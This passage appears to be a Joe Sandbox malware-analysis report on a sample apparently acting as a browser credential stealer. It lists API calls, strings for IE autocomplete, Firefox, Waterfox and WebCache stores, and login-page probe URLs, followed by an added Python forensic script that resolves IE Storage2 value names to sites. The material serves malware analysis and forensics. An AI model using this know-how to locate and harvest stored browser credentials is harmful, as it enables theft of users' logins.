                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                                  • String ID: r!A
                                                                                                                                                                                                                                  • API String ID: 2791114272-628097481
                                                                                                                                                                                                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                                  • API String ID: 2936932814-4196376884
                                                                                                                                                                                                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
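The function above is the classic Internet Explorer autocomplete-harvesting pattern: history URLs are enumerated through FindFirstUrlCacheEntryW/FindNextUrlCacheEntryW with the "visited:" prefix, lower-cased (_wcslwr), and registry values are enumerated with RegEnumValueW and upper-cased (_wcsupr); the three URLs in the dump are the well-known probe set for that store. The report only shows these APIs and strings; reading them as a lookup into HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 is the editor's inference. The following is an added forensic example, not code from the report or from the sample, that recreates the publicly documented Storage2 value-name scheme (SHA-1 over the UTF-16LE URL including its NUL terminator, upper-case hex, plus a one-byte checksum) so an analyst can map value names found in a hive back to the sites whose credentials the malware could have reached. Lower-casing the URL before hashing mirrors the _wcslwr call and is an assumption; the intranet URL and hive entries in the main block are constructed sample input.

```python
"""Map IE IntelliForms\\Storage2 value names back to the sites they protect.

Added forensic example (not code from the report or from the malware).
Assumptions: the value-name scheme is the publicly documented Storage2 one
(SHA-1 over UTF-16LE(url) + NUL, upper-case hex, plus a checksum byte), and
the URL is lower-cased first, as the _wcslwr call in the listing suggests.
"""
import hashlib

# The three "seed" URLs the memory dump contains verbatim; historically the
# probe set used against IE autocomplete stores.
SEED_URLS = (
    "http://www.facebook.com/",
    "https://login.yahoo.com/config/login",
    "https://www.google.com/accounts/servicelogin",
)


def storage2_value_name(url: str) -> str:
    """Return the 42-character Storage2 value name for `url`.

    Documented scheme: SHA-1(UTF-16LE(url) + NUL terminator) as upper-case
    hex, followed by a checksum byte = sum of the 20 digest bytes mod 256.
    Lower-casing is an assumption taken from the _wcslwr call in the listing.
    """
    data = (url.lower() + "\x00").encode("utf-16-le")
    digest = hashlib.sha1(data).digest()
    checksum = sum(digest) & 0xFF
    return digest.hex().upper() + f"{checksum:02X}"


def checksum_ok(value_name: str) -> bool:
    """Cheap integrity check a hive parser can apply to each value name."""
    if len(value_name) != 42:
        return False
    try:
        body = bytes.fromhex(value_name[:40])
        tail = int(value_name[40:], 16)
    except ValueError:
        return False
    return (sum(body) & 0xFF) == tail


def resolve_storage2_names(value_names, candidate_urls):
    """Given value names read from a hive and URLs taken from browser history,
    return ({value_name: url} for every name that matches a candidate URL,
    [names that could not be attributed to any known site])."""
    lookup = {storage2_value_name(u): u for u in candidate_urls}
    resolved, unresolved = {}, []
    for name in value_names:
        name = name.upper()  # same normalisation as the _wcsupr call
        if name in lookup:
            resolved[name] = lookup[name]
        else:
            unresolved.append(name)
    return resolved, unresolved


if __name__ == "__main__":
    # Constructed input: a history list and a hive holding entries for two
    # of the seed sites plus one bogus entry with a valid checksum.
    history = list(SEED_URLS) + ["https://intranet.example.test/login"]
    hive_names = [
        storage2_value_name(SEED_URLS[0]).lower(),
        storage2_value_name(SEED_URLS[2]),
        "00" * 21,
    ]
    resolved, unresolved = resolve_storage2_names(hive_names, history)
    for name, url in resolved.items():
        print(f"{name}  ->  {url}")
    print("unresolved:", unresolved)
```

In an investigation the candidate URL list comes from the victim's history (index.dat or WebCache) rather than from the seed list, and every value name that stays unresolved after the pass is a site the analyst has not yet accounted for.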
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                                  • String ID: BIN
                                                                                                                                                                                                                                  • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403DDA
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
• String ID: Waterfox$Waterfox\Profiles
• API String ID: 3527940856-11920434
APIs
• memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 004033B7
• memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
• wcscmp.MSVCRT ref: 004033FC
• _wcsicmp.MSVCRT ref: 00403439
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
• String ID: $0.@
• API String ID: 2758756878-1896041820
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 2941347001-0
APIs
• memset.MSVCRT ref: 00403C09
• memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
• wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
• wcscat.MSVCRT ref: 00403C70
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: memsetwcscat$Closewcscpywcslen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
• API String ID: 3249829328-1174173950
APIs
• memset.MSVCRT ref: 0040A824
• GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
• wcscpy.MSVCRT ref: 0040A854
• wcscat.MSVCRT ref: 0040A86A
• LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 669240632-0
APIs
• wcschr.MSVCRT ref: 00414458
• _snwprintf.MSVCRT ref: 0041447D
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
• GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: PrivateProfileString$Write_snwprintfwcschr
• String ID: "%s"
• API String ID: 1343145685-3297466227
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
• GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
• GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: AddressHandleModuleProcProcessTimes
• String ID: GetProcessTimes$kernel32.dll
• API String ID: 1714573020-3385500049
APIs
• memset.MSVCRT ref: 004087D6
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
• memset.MSVCRT ref: 00408828
• memset.MSVCRT ref: 00408840
• memset.MSVCRT ref: 00408858
• memset.MSVCRT ref: 00408870
• memset.MSVCRT ref: 00408888
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
• String ID:
• API String ID: 2911713577-0
APIs
• memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
• memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
• memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960
APIs
  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
• memset.MSVCRT ref: 00414C87
• RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
• wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: AddressCloseProcVersionmemsetwcscpy
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 2705122986-2036018995
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmpqsort
• String ID: /nosort$/sort
• API String ID: 1579243037-1578091866
APIs
• memset.MSVCRT ref: 0040E60F
• memset.MSVCRT ref: 0040E629
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
• Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                                  • API String ID: 3354267031-2114579845
                                                                                                                                                                                                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??3@DeleteObject
                                                                                                                                                                                                                                  • String ID: r!A
                                                                                                                                                                                                                                  • API String ID: 1103273653-628097481
                                                                                                                                                                                                                                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??2@
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                                                                                                                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
